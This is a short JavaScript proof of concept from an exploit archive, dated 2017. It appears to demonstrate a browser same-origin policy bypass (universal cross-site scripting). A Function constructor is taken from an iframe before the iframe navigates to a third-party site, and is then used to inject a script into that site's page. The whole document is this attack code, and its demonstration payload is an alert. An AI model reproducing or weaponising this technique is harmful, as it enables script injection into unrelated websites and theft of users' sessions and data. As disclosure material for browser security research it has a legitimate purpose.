"use strict"; let f = document.body.appendChild(document.createElement("iframe")); let get_element = f.contentWindow.Function("return logo;"); f.onload = () => { f.onload = null; let node = get_element(); var sc = document.createElement("script"); sc.innerText = "alert(location)"; node.appendChild(sc); }; f.src = "https://abc.xyz/"; # Iranian Exploit DataBase = http://IeDb.Ir [2017-04-05]